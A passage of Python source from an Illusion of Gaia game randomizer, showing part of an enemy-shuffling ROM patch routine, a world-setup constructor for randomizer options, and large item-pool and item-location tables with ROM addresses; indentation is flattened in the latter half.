        # NOTE(review): `set` shadows the builtin; kept as-is for byte-identity
        enemysets = []
        for set in self.enemysets:
            enemysets.append(set)
        # NOTE(review): redundant second read -- `rom` was already read above
        f.seek(0)
        rom = f.read()
        # Shuffle enemy stats in Insane
        if self.enemizer == "Insane":
            insane_enemies = []
            insane_templates = []
            for enemy in self.enemies:
                if self.enemies[enemy][5] and enemy != 102:  # Special exception for Zombies
                    insane_enemies.append(enemy)
                    insane_templates.append(self.enemies[enemy][2])
            random.shuffle(insane_templates)
            # Map each shuffleable enemy ID to a randomly drawn stat template
            insane_dictionary = {}
            i = 0
            for enemy in insane_enemies:
                insane_dictionary[enemy] = insane_templates[i]
                i += 1
        # Randomize enemy spritesets
        # NOTE(review): `map` shadows the builtin; kept as-is for byte-identity
        for map in self.maps:
            complex_ct = 0
            oldset = self.maps[map][0]
            # Determine new enemyset for map
            if self.enemizer == "Limited":
                sets = [oldset]  # Limited mode keeps the map's original set
            elif not self.maps[map][7]:
                sets = enemysets[:]  # no restriction list: any set allowed
            else:
                sets = self.maps[map][7][:]  # restricted to the map's allowed sets
            random.shuffle(sets)
            newset = sets[0]
            # if 10 in sets:  # TESTING!
            #     newset = 10
            # newset = test_set # TESTING!
            # Gather enemies from old and new sets
            old_enemies = []
            new_enemies = []
            for enemy in self.enemies:
                if self.enemies[enemy][0] == oldset:
                    old_enemies.append(enemy)
                if self.enemies[enemy][0] == newset and self.enemies[enemy][5]:
                    new_enemies.append(enemy)
            # Update map header to reflect new enemyset
            if self.maps[map][3]:
                self.map_patches.append([self.maps[map][3],self.enemysets[newset][0],self.maps[map][4]])
            # Randomize each enemy in map
            # addr_start/addr_end are hex-string bounds of the map's sprite data
            addr_start = self.maps[map][5]
            addr_end = self.maps[map][6]
            for enemy in old_enemies:
                # print self.enemies[enemy][3]
                done = False
                addr = int(addr_start, 16) + rom_offset
                while not done:
                    # Scan for this enemy's signature (addr bytes + template) within the map range
                    addr = rom.find(self.enemies[enemy][1] + self.enemies[enemy][2], addr + 1)
                    if addr < 0 or addr > int(addr_end, 16) + rom_offset:
                        done = True
                    else:
                        # Pick an enemy from new set
                        enemytype = self.enemies[enemy][3]
                        walkable = self.enemies[enemy][4]
                        new_enemies_tmp = new_enemies[:]
                        # Get X/Y for special placement exceptions
                        # hexlify yields ASCII hex digits, e.g. b"1f"
                        f.seek(addr - 3)
                        xcoord = binascii.hexlify(f.read(1))
                        ycoord = binascii.hexlify(f.read(1))
                        # 4-Ways cannot be on a #$XF x-coord
                        if newset == 1 and 13 in new_enemies_tmp:
                            if xcoord[1] == 102:  # 102 == ord('f'): low nibble is F
                                new_enemies_tmp.remove(13)
                        # Zip Flies can't be too close to map origin
                        elif newset == 10 and 103 in new_enemies_tmp:
                            if int(xcoord, 16) <= 4 or int(ycoord, 16) <= 4:
                                new_enemies_tmp.remove(103)
                        random.shuffle(new_enemies_tmp)
                        i = 0
                        found_enemy = False
                        # if 13 in new_enemies_tmp: # TESTING!
                        #     new_enemy = 13
                        #     found_enemy = True
                        # Walk candidates until one matches walkability (last entry is forced)
                        while not found_enemy:
                            new_enemy = new_enemies_tmp[i]
                            new_enemytype = self.enemies[new_enemy][3]
                            new_walkable = self.enemies[new_enemy][4]
                            if walkable or new_enemytype == 3 or walkable == new_walkable or i == len(new_enemies_tmp) - 1:
                                found_enemy = True
                                # Limit number of complex enemies per map
                                if new_enemy in complex_enemies:
                                    complex_ct += 1
                                    if complex_ct >= max_complex:
                                        # NOTE(review): removes from new_enemies while
                                        # iterating it -- list mutation during iteration
                                        # can skip adjacent complex entries; confirm intent
                                        for enemy_tmp in new_enemies:
                                            if enemy_tmp in complex_enemies:
                                                new_enemies.remove(enemy_tmp)
                                        i -= 1
                            i += 1
                        # Overwrite the enemy record in place (addr byte + new enemy bytes)
                        f.seek(addr - 1)
                        # f.write(b"\x00" + self.enemies[test_enemy][1] + self.enemies[test_enemy][2]) # TESTING!
                        f.write(b"\x00" + self.enemies[new_enemy][1])
                        if self.enemizer == "Balanced" and enemy == 102:
                            f.write(b"\x47")
                        elif map != 27 and self.enemizer != "Balanced":  # Moon Tribe cave enemies retain same template
                            if self.enemizer == "Insane" and new_enemy != 102:  # Again, zombie exception
                                f.write(insane_dictionary[new_enemy])
                            else:
                                f.write(self.enemies[new_enemy][2])
        # Disable all non-enemy sprites
        if self.enemizer != "Limited":
            for sprite in self.nonenemy_sprites:
                f.seek(int(self.nonenemy_sprites[sprite][1], 16) + rom_offset + 3)
                f.write(b"\x02\xe0")
# Build world
def __init__(self, settings: RandomizerData, statues_required=6, statues=[1,2,3,4,5,6], statue_req=StatueReq.GAME_CHOICE.value, kara=3, gem=[3,5,8,12,20,30,50], incatile=[9,5], hieroglyphs=[1,2,3,4,5,6], boss_order=[1,2,3,4,5,6,7]):
self.seed = settings.seed
self.race_mode = settings.race_mode
self.fluteless = settings.fluteless
self.statues = statues
self.statues_required = statues_required
self.statue_req = statue_req
self.boss_order = boss_order
self.dungeons_req = []
for x in self.statues:
self.dungeons_req.append(self.boss_order[x-1])
gaia_coinflip = random.randint(0, 1)
if settings.goal.value == Goal.RED_JEWEL_HUNT.value:
self.goal = "Red Jewel Hunt"
elif settings.goal.value == Goal.APO_GAIA.value or (settings.goal.value == Goal.RANDOM_GAIA.value and gaia_coinflip):
self.goal = "Apocalypse Gaia"
else:
self.goal = "Dark Gaia"
if settings.logic.value == Logic.COMPLETABLE.value:
self.logic_mode = "Completable"
elif settings.logic.value == Logic.BEATABLE.value:
self.logic_mode = "Beatable"
else:
self.logic_mode = "Chaos"
if settings.entrance_shuffle.value == EntranceShuffle.NONE.value:
self.entrance_shuffle = "None"
elif settings.entrance_shuffle.value == EntranceShuffle.COUPLED.value:
self.entrance_shuffle = "Coupled"
elif settings.entrance_shuffle.value == EntranceShuffle.UNCOUPLED.value:
self.entrance_shuffle = "Uncoupled"
if settings.start_location.value == StartLocation.SOUTH_CAPE.value:
self.start_mode = "South Cape"
elif settings.start_location.value == StartLocation.SAFE.value:
self.start_mode = "Safe"
elif settings.start_location.value == StartLocation.UNSAFE.value:
self.start_mode = "Unsafe"
else:
self.start_mode = "Forced Unsafe"
if settings.enemizer.value == Enemizer.NONE.value:
self.enemizer = "None"
elif settings.enemizer.value == Enemizer.BALANCED.value:
self.enemizer = "Balanced"
elif settings.enemizer.value == Enemizer.LIMITED.value:
self.enemizer = "Limited"
elif settings.enemizer.value == Enemizer.FULL.value:
self.enemizer = "Full"
else:
self.enemizer = "Insane"
if settings.ohko:
self.variant = ["OHKO"]
elif settings.red_jewel_madness:
self.variant = ["RJM"]
else:
self.variant = []
if settings.allow_glitches:
self.variant.append("Allow Glitches")
if settings.boss_shuffle:
self.variant.append("Boss Shuffle")
if settings.overworld_shuffle:
self.variant.append("Overworld Shuffle")
if settings.open_mode:
self.variant.append("Open Mode")
if settings.z3:
self.variant.append("Z3 Mode")
self.firebird = settings.firebird
self.start_loc = 10
# self.level = settings.level.value
self.difficulty = settings.difficulty.value
self.kara = kara
self.gem = gem
self.incatile = incatile
self.hieroglyphs = hieroglyphs
self.placement_log = []
self.exit_log = []
self.spoilers = []
self.required_items = [20, 36]
self.good_items = [10, 13, 24, 25, 37, 62, 63, 64]
self.trolly_locations = [32, 45, 64, 65, 102, 108, 121, 128, 136, 147]
self.free_locations = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 24, 33, 34, 35, 36, 37, 38, 39]
self.map_patches = []
self.visited = []
self.items_collected = []
self.item_destinations = []
self.open_locations = [[],[]]
self.open_edges = []
self.graph_viz = None
# Initialize item pool, considers special attacks as "items"
# Format = { ID: [Quantity, Type code (1=item, 2=ability, 3=statue,4=other),
# ROM Code, Name, TakesInventorySpace,
# ProgressionType (1=unlocks new locations,2=quest item,3=no progression)] }
self.item_pool = {
# Items
0: [2, 1, b"\x00", "Nothing", False, 3],
1: [45, 1, b"\x01", "Red Jewel", False, 1],
2: [1, 1, b"\x02", "Prison Key", True, 1],
3: [1, 1, b"\x03", "Inca Statue A", True, 1],
4: [1, 1, b"\x04", "Inca Statue B", True, 1],
5: [0, 1, b"\x05", "Inca Melody", True, 3],
6: [12, 1, b"\x06", "Herb", False, 3],
7: [1, 1, b"\x07", "Diamond Block", True, 1],
8: [1, 1, b"\x08", "Wind Melody", True, 1],
9: [1, 1, b"\x09", "Lola's Melody", True, 1],
10: [1, 1, b"\x0a", "Large Roast", True, 1],
11: [1, 1, b"\x0b", "Mine Key A", True, 1],
12: [1, 1, b"\x0c", "Mine Key B", True, 1],
13: [1, 1, b"\x0d", "Memory Melody", True, 1],
14: [4, 1, b"\x0e", "Crystal Ball", True, 2],
15: [1, 1, b"\x0f", "Elevator Key", True, 1],
16: [1, 1, b"\x10", "Mu Palace Key", True, 1],
17: [1, 1, b"\x11", "Purification Stone", True, 1],
18: [2, 1, b"\x12", "Statue of Hope", True, 1],
19: [2, 1, b"\x13", "Rama Statue", False, 2],
20: [1, 1, b"\x14", "Magic Dust", True, 2],
21: [0, 1, b"\x15", "Blue Journal", False, 3],
22: [1, 1, b"\x16", "Lance's Letter", False, 3],
23: [1, 1, b"\x17", "Necklace Stones", True, 1],
24: [1, 1, b"\x18", "Will", True, 1],
25: [1, 1, b"\x19", "Teapot", True, 1],
26: [3, 1, b"\x1a", "Mushroom Drops", True, 1],
27: [0, 1, b"\x1b", "Bag of Gold", False, 3],
28: [1, 1, b"\x1c", "Black Glasses", False, 1],
29: [1, 1, b"\x1d", "Gorgon Flower", True, 1],
30: [1, 1, b"\x1e", "Hieroglyph", False, 2],
31: [1, 1, b"\x1f", "Hieroglyph", False, 2],
32: [1, 1, b"\x20", "Hieroglyph", False, 2],
33: [1, 1, b"\x21", "Hieroglyph", False, 2],
34: [1, 1, b"\x22", "Hieroglyph", False, 2],
35: [1, 1, b"\x23", "Hieroglyph", False, 2],
36: [1, 1, b"\x24", "Aura", True, 1],
37: [1, 1, b"\x25", "Lola's Letter", False, 1],
38: [1, 1, b"\x26", "Father's Journal", False, 2],
39: [1, 1, b"\x27", "Crystal Ring", False, 1],
40: [1, 1, b"\x28", "Apple", True, 1],
41: [1, 1, b"\x2e", "2 Red Jewels", False, 1],
42: [1, 1, b"\x2f", "3 Red Jewels", False, 1],
# Status Upgrades
50: [3, 1, b"\x87", "HP Upgrade", False, 3],
51: [1, 1, b"\x89", "DEF Upgrade", False, 3],
52: [2, 1, b"\x88", "STR Upgrade", False, 3],
53: [1, 1, b"\x8a", "Psycho Dash Upgrade", False, 3],
54: [2, 1, b"\x8b", "Dark Friar Upgrade", False, 3],
55: [0, 1, b"\x8c", "Heart Piece", False, 3],
# Abilities
60: [0, 2, "", "Nothing", False, 3],
61: [1, 2, "", "Psycho Dash", False, 1],
62: [1, 2, "", "Psycho Slider", False, 1],
63: [1, 2, "", "Spin Dash", False, 1],
64: [1, 2, "", "Dark Friar", False, 1],
65: [1, 2, "", "Aura Barrier", False, 1],
66: [1, 2, "", "Earthquaker", False, 1],
67: [0, 2, "", "Firebird", False, 1],
# Mystic Statues
100: [1, 3, "", "Mystic Statue 1", False, 2],
101: [1, 3, "", "Mystic Statue 2", False, 2],
102: [1, 3, "", "Mystic Statue 3", False, 2],
103: [1, 3, "", "Mystic Statue 4", False, 2],
104: [1, 3, "", "Mystic Statue 5", False, 2],
105: [1, 3, "", "Mystic Statue 6", False, 2],
106: [0, 3, "", "Mystic Statue", False, 2],
# Event Switches
500: [0, 4, "", "Kara Released", False, 1],
501: [0, 4, "", "Itory: Got Lilly", False, 1],
502: [0, 4, "", "Moon Tribe: Healed Spirits", False, 1],
503: [0, 4, "", "Inca: Beat Castoth", False, 1],
504: [0, 4, "", "Freejia: Found Laborer", False, 1],
505: [0, 4, "", "Neil's: Memory Restored", False, 1],
506: [0, 4, "", "Sky Garden: Map 82 NW Switch", False, 1],
507: [0, 4, "", "Sky Garden: Map 82 NE Switch", False, 1],
508: [0, 4, "", "Sky Garden: Map 82 NW Switch", False, 1],
509: [0, 4, "", "Sky Garden: Map 84 Switch", False, 1],
510: [0, 4, "", "Seaside: Fountain Purified", False, 1],
511: [0, 4, "", "Mu: Water Lowered 1", False, 1],
512: [0, 4, "", "Mu: Water Lowered 2", False, 1],
513: [0, 4, "", "Angel: Puzzle Complete", False, 1],
514: [0, 4, "", "Mt Kress: Drops Used 1", False, 1],
515: [0, 4, "", "Mt Kress: Drops Used 2", False, 1],
516: [0, 4, "", "Mt Kress: Drops Used 3", False, 1],
517: [0, 4, "", "Pyramid: Hieroglyphs Placed", False, 1],
518: [0, 4, "", "Babel: Castoth Defeated", False, 1],
519: [0, 4, "", "Babel: Viper Defeated", False, 1],
520: [0, 4, "", "Babel: Vampires Defeated", False, 1],
521: [0, 4, "", "Babel: Sand Fanger Defeated", False, 1],
522: [0, 4, "", "Babel: Mummy Queen Defeated", False, 1],
523: [0, 4, "", "Mansion: Solid Arm Defeated", False, 1],
# Misc
600: [0, 4, "", "Freedan Access", False, 1],
601: [0, 4, "", "Glitches", False, 1],
602: [0, 4, "", "Early Firebird", False, 1]
}
# Define Item/Ability/Statue locations
# Format: { ID: [Region, Type (1=item,2=ability,3=statue,4=other), Filled Flag,
# Filled Item, Restricted Items, Item Addr, Text Addr, Text2 Addr,
# Special (map# or inventory addr), Name, Swapped Flag]}
# (For random start, [6]=Type, [7]=XY_spawn_data)
self.item_locations = {
# Jeweler
0: [2, 1, False, 0, [], "8d019", "8d19d", "", "8d260", "Jeweler Reward 1 "],
1: [3, 1, False, 0, [], "8d028", "8d1ba", "", "8d274", "Jeweler Reward 2 "],
2: [4, 1, False, 0, [], "8d037", "8d1d7", "", "8d288", "Jeweler Reward 3 "],
3: [5, 1, False, 0, [], "8d04a", "8d1f4", "", "8d29c", "Jeweler Reward 4 "],
4: [6, 1, False, 0, [], "8d059", "8d211", "", "8d2b0", "Jeweler Reward 5 "],
5: [7, 1, False, 0, [], "8d069", "8d2ea", "", "8d2c4", "Jeweler Reward 6 "],
# South Cape
6: [21, 1, False, 0, [], "F51D", "F52D", "F543", "", "South Cape: Bell Tower "],
7: [20, 1, False, 0, [], "4846e", "48479", "", "", "South Cape: Fisherman "], # text2 was 0c6a1
8: [26, 1, False, 0, [], "F59D", "F5AD", "F5C3", "", "South Cape: Lance's House "],
9: [23, 1, False, 0, [], "499e4", "49be5", "", "", "South Cape: Lola "],
10: [21, 2, False, 0, [64, 65, 66], "c830a", "Safe", b"\xE0\x00\x70\x00\x83\x00\x43", b"\x01", "South Cape: Dark Space "],
# Edward's
11: [30, 1, False, 0, [], "4c214", "4c299", "", "", "Edward's Castle: Hidden Guard "],
12: [30, 1, False, 0, [], "4d0ef", "4d141", "", "", "Edward's Castle: Basement "],
13: [32, 1, False, 0, [], "4d32f", "4d4b1", "", "", "Edward's Prison: Hamlet "], # text 4d5f4?
14: [32, 2, False, 0, [64, 65, 66], "c8637", "", "", b"\x0b", "Edward's Prison: Dark Space "],
# Underground Tunnel
15: [42, 1, False, 0, [], "1AFA9", "", "", "", "Underground Tunnel: Spike's Chest "],
16: [44, 1, False, 0, [], "1AFAE", "", "", "", "Underground Tunnel: Small Room Chest"],
17: [48, 1, False, 0, [], "1AFB3", "", "", "", "Underground Tunnel: Ribber's Chest "],
18: [49, 1, False, 0, [], "F61D", "F62D", "F643", "", "Underground Tunnel: Barrels "],
19: [47, 2, False, 0, [], "c8aa2", "Unsafe", b"\xA0\x00\xD0\x04\x83\x00\x74", b"\x12", "Underground Tunnel: Dark Space "], # Always open
# Itory
20: [51, 1, False, 0, [], "F69D", "F6AD", "F6C3", "", "Itory Village: Logs "],
21: [58, 1, False, 0, [], "4f375", "4f38d", "4f3a8", "", "Itory Village: Cave "],
22: [51, 2, False, 0, [64, 65, 66], "c8b34", "Safe", b"\x30\x04\x90\x00\x83\x00\x35", b"\x15", "Itory Village: Dark Space "],
# Moon Tribe
23: [62, 1, False, 0, [], "4fae1", "4faf9", "4fb16", "", "Moon Tribe: Cave "],
# Inca
24: [71, 1, False, 0, [], "1AFB8", "", "", "", "Inca Ruins: Diamond-Block Chest "],
25: [92, 1, False, 0, [], "1AFC2", "", "", "", "Inca Ruins: Broken Statues Chest "],
26: [83, 1, False, 0, [], "1AFBD", "", "", "", "Inca Ruins: Stone Lord Chest "],
27: [93, 1, False, 0, [], "1AFC6", "", "", "", "Inca Ruins: Slugger Chest "],
28: [76, 1, False, 0, [], "9c5bd", "9c614", "9c637", "", "Inca Ruins: Singing Statue "],
29: [96, 2, False, 0, [], "c9302", "Unsafe", b"\x10\x01\x90\x00\x83\x00\x32", b"\x28", "Inca Ruins: Dark Space 1 "], # Always open
30: [93, 2, False, 0, [], "c923b", "Unsafe", b"\xC0\x01\x50\x01\x83\x00\x32", b"\x26", "Inca Ruins: Dark Space 2 "],
31: [77, 2, False, 0, [], "c8db8", "", "", b"\x1e", "Inca Ruins: Final Dark Space "],
# Gold Ship
32: [100, 1, False, 0, [], "5965e", "5966e", "", "", "Gold Ship: Seth "],
# Diamond Coast
33: [102, 1, False, 0, [], "F71D", "F72D", "F743", "", "Diamond Coast: Jar "],
# Freejia
34: [121, 1, False, 0, [], "F79D", "F7AD", "F7C3", "", "Freejia: Hotel "],
35: [110, 1, False, 0, [], "5b6d8", "5b6e8", "", "", "Freejia: Creepy Guy "],
36: [110, 1, False, 0, [], "5cf9e", "5cfae", "5cfc4", "", "Freejia: Trash Can 1 "],
37: [110, 1, False, 0, [], "5cf3d", "5cf49", "", "", "Freejia: Trash Can 2 "], # text2 was 5cf5b
38: [115, 1, False, 0, [], "5b8b7", "5b962", "5b9ee", "", "Freejia: Snitch "], # text1 was @5b94d
39: [125, 2, False, 0, [64, 65, 66], "c96ce", "Safe", b"\x40\x00\xa0\x00\x83\x00\x11", b"\x34", "Freejia: Dark Space "],
# Diamond Mine
40: [134, 1, False, 0, [], "1AFD0", "", "", "", "Diamond Mine: Chest "],
41: [137, 1, False, 0, [], "5d7e4", "5d819", "5d830", "", "Diamond Mine: Trapped Laborer "],
42: [143, 1, False, 0, [], "aa777", "aa85c", "", "", "Diamond Mine: Laborer w/Elevator Key"], # text1 was aa811
43: [148, 1, False, 0, [], "5d4d2", "5d4eb", "5d506", "", "Diamond Mine: Morgue "],
44: [149, 1, False, 0, [], "aa757", "aa7ef", "", "", "Diamond Mine: Laborer w/Mine Key "], # text1 was aa7b4
45: [150, 1, False, 0, [], "5d2b0", "5d2da", "", "", "Diamond Mine: Sam "],
46: [136, 2, False, 0, [], "c9a87", "Unsafe", b"\xb0\x01\x70\x01\x83\x00\x32", b"\x40", "Diamond Mine: Appearing Dark Space "], # Always open
47: [131, 2, False, 0, [], "c98b0", "Unsafe", b"\xd0\x00\xc0\x00\x83\x00\x61", b"\x3d", "Diamond Mine: Dark Space at Wall "],
48: [142, 2, False, 0, [], "c9b49", "", "", b"\x42", "Diamond Mine: Dark Space behind Wall"],
# Sky Garden
49: [172, 1, False, 0, [], "1AFDD", "", "", "", "Sky Garden: (NE) Platform Chest "],
50: [173, 1, False, 0, [], "1AFD9", "", "", "", "Sky Garden: (NE) Blue Cyber Chest "],
51: [174, 1, False, 0, [], "1AFD5", "", "", "", "Sky Garden: (NE) Statue Chest "],
52: [180, 1, False, 0, [], "1AFE2", "", "", "", "Sky Garden: (SE) Dark Side Chest "],
53: [185, 1, False, 0, [], "1AFE7", "", "", "", "Sky Garden: (SW) Ramp Chest "],
54: [186, 1, False, 0, [], "1AFEC", "", "", "", "Sky Garden: (SW) Dark Side Chest "],
55: [194, 1, False, 0, [], "1AFF1", "", "", "", "Sky Garden: (NW) Top Chest "],
56: [194, 1, False, 0, [], "1AFF5", "", "", "", "Sky Garden: (NW) Bottom Chest "],
57: [170, 2, False, 0, [64, 65, 66], "c9d63", "Safe", b"\x90\x00\x70\x00\x83\x00\x22", b"\x4c", "Sky Garden: Dark Space (Foyer) "],
58: [169, 2, False, 0, [], "ca505", "Unsafe", b"\x70\x00\xa0\x00\x83\x00\x11", b"\x56", "Sky Garden: Dark Space (SE) "], # in the room
59: [183, 2, False, 0, [], "ca173", "", "", b"\x51", "Sky Garden: Dark Space (SW) "],
60: [195, 2, False, 0, [], "ca422", "Unsafe", b"\x20\x00\x70\x00\x83\x00\x44", b"\x54", "Sky Garden: Dark Space (NW) "],
# Seaside Palace
61: [202, 1, False, 0, [], "1AFFF", "", "", "", "Seaside Palace: Side Room Chest "],
62: [200, 1, False, 0, [], "1AFFA", "", "", "", "Seaside Palace: First Area Chest "],
63: [205, 1, False, 0, [], "1B004", "", "", "", "Seaside Palace: Second Area Chest "],
64: [206, 1, False, 0, [], "68af7", "68ea9", "68f02", "", "Seaside Palace: Buffy "],
65: [208, 1, False, 0, [], "6922d", "6939e", "693b7", "", "Seaside Palace: Coffin "], # text1 was 69377
66: [200, 2, False, 0, [64, 65, 66], "ca574", "Safe", b"\xf0\x02\x90\x00\x83\x00\x64", b"\x5a", "Seaside Palace: Dark Space "],
# Mu
67: [217, 1, False, 0, [], "1B012", "", "", "", "Mu: Empty Chest 1 "],
68: [220, 1, False, 0, [], "1B01B", "", "", "", "Mu: Empty Chest 2 "],
69: [225, 1, False, 0, [], "698be", "698d2", "", "", "Mu: Hope Statue 1 "],
70: [236, 1, False, 0, [], "69966", "69975", "", "", "Mu: Hope Statue 2 "],
71: [215, 1, False, 0, [], "1B00D", "", "", "", "Mu: Chest s/o Hope Room 2 "],
72: [214, 1, False, 0, [], "1B009", "", "", "", "Mu: Rama Chest N "],
73: [219, 1, False, 0, [], "1B016", "", "", "", "Mu: Rama Chest E "],
74: [218, 2, False, 0, [], "ca92d", "", "", b"\x60", "Mu: Open Dark Space "], # Always open
75: [228, 2, False, 0, [], "caa99", "", "", b"\x62", "Mu: Slider Dark Space "],
# Angel Village
76: [254, 1, False, 0, [], "F81D", "F82D", "F843", "", "Angel Village: Dance Hall "],
77: [255, 2, False, 0, [64, 65, 66], "caf67", "Safe", b"\x90\x01\xb0\x00\x83\x01\x12", b"\x6c", "Angel Village: Dark Space "],
# Angel Dungeon
78: [265, 1, False, 0, [], "1B020", "", "", "", "Angel Dungeon: Slider Chest "],
79: [271, 1, False, 0, [], "F89D", "F8AD", "F8C3", "", "Angel Dungeon: Ishtar's Room "],
80: [274, 1, False, 0, [], "1B02A", "", "", "", "Angel Dungeon: Puzzle Chest 1 "],
81: [274, 1, False, 0, [], "1B02E", "", "", "", "Angel Dungeon: Puzzle Chest 2 "],
82: [273, 1, False, 0, [], "1B025", "", "", "", "Angel Dungeon: Ishtar's Chest "],
# Watermia
83: [280, 1, False, 0, [], "F91D", "F92D", "F943", "", "Watermia: West Jar "],
85: [286, 1, False, 0, [], "7ad21", "7aede", "", "", "Watermia: Lance "], # text2 was 7afa7
86: [283, 1, False, 0, [], "F99D", "F9AD", "F9C3", "", "Watermia: Gambling House "],
87: [280, 1, False, 0, [], "79248", "79288", "792a1", "", "Watermia: Russian Glass "],
88: [282, 2, False, 0, [64, 65, 66], "cb644", "Safe", b"\x40\x00\xa0\x00\x83\x00\x11", b"\x7c", "Watermia: Dark Space "],
# Great Wall
89: [290, 1, False, 0, [], "7b5c5", "7b5d1", "", "", "Great Wall: Necklace 1 "],
90: [292, 1, False, 0, [], "7b625", "7b631", "", "", "Great Wall: Necklace 2 "],
91: [292, 1, False, 0, [], "1B033", "", "", "", "Great Wall: Chest 1 "],
92: [294, 1, False, 0, [], "1B038", "", "", "", "Great Wall: Chest 2 "],
93: [295, 2, False, 0, [], "cbb11", "Unsafe", b"\x60\x00\xc0\x02\x83\x20\x38", b"\x85", "Great Wall: Archer Dark Space "],
94: [297, 2, False, 0, [], "cbb80", "Unsafe", b"\x50\x01\x80\x04\x83\x00\x63", b"\x86", "Great Wall: Platform Dark Space "], # Always open
95: [300, 2, False, 0, [], "cbc60", "", "", b"\x88", "Great Wall: Appearing Dark Space "],
# Euro
96: [310, 1, False, 0, [], "FA1D", "FA2D", "FA43", "", "Euro: Alley "],
97: [310, 1, False, 0, [], "7c0b3", "7c0f3", "", "", "Euro: Apple Vendor "],
98: [320, 1, False, 0, [], "7e51f", "7e534", "7e54a", "", "Euro: Hidden House "],
99: [323, 1, False, 0, [], "7cd12", "7cd39", "7cd9b", "", "Euro: Store Item 1 "],
100: [323, 1, False, 0, [], "7cdf9", "7ce28", "7ce3e", "", "Euro: Store Item 2 "], # text2 was 7cedd
101: [321, 1, False, 0, [], "FA9D", "FAAD", "FAC3", "", "Euro: Shrine "],
102: [315, 1, False, 0, [], "7df58", "7e10a", "", "", "Euro: Ann "],
103: [325, 2, False, 0, [64, 65, 66], "cc0b0", "Safe", b"\xb0\x00\xb0\x00\x83\x00\x11", b"\x99", "Euro: Dark Space "],
# Mt Temple
104: [336, 1, False, 0, [], "1B03D", "", "", "", "Mt. Temple: Red Jewel Chest "],
105: [338, 1, False, 0, [], "1B042", "", "", "", "Mt. Temple: Drops Chest 1 "],
106: [342, 1, False, 0, [], "1B047", "", "", "", "Mt. Temple: Drops Chest 2 "],
107: [343, 1, False, 0, [], "1B04C", "", "", "", "Mt. Temple: Drops Chest 3 "],
108: [345, 1, False, 0, [], "1B051", "", "", "", "Mt. Temple: Final Chest "],
109: [332, 2, False, 0, [], "cc24f", "Unsafe", b"\xf0\x01\x10\x03\x83\x00\x44", b"\xa1", "Mt. Temple: Dark Space 1 "],
110: [337, 2, False, 0, [], "cc419", "Unsafe", b"\xc0\x07\xc0\x00\x83\x00\x28", b"\xa3", "Mt. Temple: Dark Space 2 "],
111: [343, 2, False, 0, [], "cc7b8", "", "", b"\xa7", "Mt. Temple: Dark Space 3 "],
# Natives'
112: [353, 1, False, 0, [], "FB1D", "FB2D", "FB43", "", "Natives' Village: Statue Room "],
113: [354, 1, False, 0, [], "893af", "8942a", "", "", "Natives' Village: Statue "],
114: [350, 2, False, 0, [64, 65, 66], "cca37", "Safe", b"\xc0\x01\x50\x00\x83\x00\x22", b"\xac", "Natives' Village: Dark Space "],
# Ankor Wat
115: [361, 1, False, 0, [], "1B056", "", "", "", "Ankor Wat: Ramp Chest "],
116: [370, 1, False, 0, [], "1B05B", "", "", "", "Ankor Wat: Flyover Chest "],
117: [378, 1, False, 0, [], "1B060", "", "", "", "Ankor Wat: U-Turn Chest "],
118: [382, 1, False, 0, [], "1B065", "", "", "", "Ankor Wat: Drop Down Chest "],
119: [389, 1, False, 0, [], "1B06A", "", "", "", "Ankor Wat: Forgotten Chest "],
120: [380, 1, False, 0, [], "89fa3", "89fbb", "", "", "Ankor Wat: Glasses Location "], # slow text @89fdc
121: [391, 1, False, 0, [], "89adc", "89af1", "89b07", "", "Ankor Wat: Spirit "], # item was 89b0d, text was 89e2e
122: [372, 2, False, 0, [], "cce92", "Unsafe", b"\x20\x04\x30\x03\x83\x00\x46", b"\xb6", "Ankor Wat: Garden Dark Space "], # Always open
123: [377, 2, False, 0, [], "cd0a2", "", "", b"\xb8", "Ankor Wat: Earthquaker Dark Space "],
124: [383, 2, False, 0, [], "cd1a7", "Unsafe", b"\xb0\x02\xc0\x01\x83\x00\x33", b"\xbb", "Ankor Wat: Drop Down Dark Space "], # Always open
# Dao
125: [400, 1, False, 0, [], "8b1b0", "", "", "", "Dao: Entrance Item 1 "],
126: [400, 1, False, 0, [], "8b1b5", "", "", "", "Dao: Entrance Item 2 "],
127: [400, 1, False, 0, [], "FB9D", "FBAD", "FBC3", "", "Dao: East Grass "],
128: [403, 1, False, 0, [], "8b016", "8b073", "8b090", "", "Dao: Snake Game "],
129: [400, 2, False, 0, [64, 65, 66], "cd3d0", "Safe", b"\x20\x00\x80\x00\x83\x00\x23", b"\xc3", "Dao: Dark Space "],
# Pyramid
130: [411, 1, False, 0, [], "8dcb7", "8e66c", "8e800", "", "Pyramid: Dark Space Top "], # text2 was 8e800
131: [412, 1, False, 0, [], "FC1D", "FC2D", "FC43", "", "Pyramid: Hidden Platform "],
132: [442, 1, False, 0, [], "8c7b2", "8c7c9", "", "", "Pyramid: Hieroglyph 1 "],
133: [422, 1, False, 0, [], "1B06F", "", "", "", "Pyramid: Room 2 Chest "],
134: [443, 1, False, 0, [], "8c879", "8c88c", "", "", "Pyramid: Hieroglyph 2 "],
135: [432, 1, False, 0, [], "1B079", "", "", "", "Pyramid: Room 3 Chest "],
136: [444, 1, False, 0, [], "8c921", "8c934", "", "", "Pyramid: Hieroglyph 3 "],
137: [439, 1, False, 0, [], "1B07E", "", "", "", "Pyramid: Room 4 Chest "],
138: [445, 1, False, 0, [], "8c9c9", "8c9dc", "", "", "Pyramid: Hieroglyph 4 "],
139: [428, 1, False, 0, [], "1B074", "", "", "", "Pyramid: Room 5 Chest "],
140: [446, 1, False, 0, [], "8ca71", "8ca84", "", "", "Pyramid: Hieroglyph 5 "],
141: [447, 1, False, 0, [], "8cb19", "8cb2c", "", "", "Pyramid: Hieroglyph 6 "],
142: [413, 2, True, 0, [], "cd570", "Unsafe", b"\xc0\x01\x90\x03\x83\x00\x44", b"\xcc", "Pyramid: Dark Space Bottom "], # Always open
# Babel
143: [461, 1, False, 0, [], "FC9D", "FCAD", "FCC3", "", "Babel: Pillow "],
144: [461, 1, False, 0, [], "99a4f", "99ae4", "99afe", "", "Babel: Force Field "], # item was 99a61
145: [461, 2, False, 0, [64, 65, 66], "ce09b", "Forced Unsafe", b"\x90\x07\xb0\x01\x83\x10\x28", b"\xdf", "Babel: Dark Space Bottom "],
146: [472, 2, False, 0, [64, 65, 66], "ce159", "Safe", b"\xb0\x02\xb0\x01\x83\x10\x23", b"\xe3", "Babel: Dark Space Top "],
# Jeweler's Mansion
147: [480, 1, False, 0, [], "1B083", "", "", "", "Jeweler's Mansion: Chest "],
# Mystic Statues
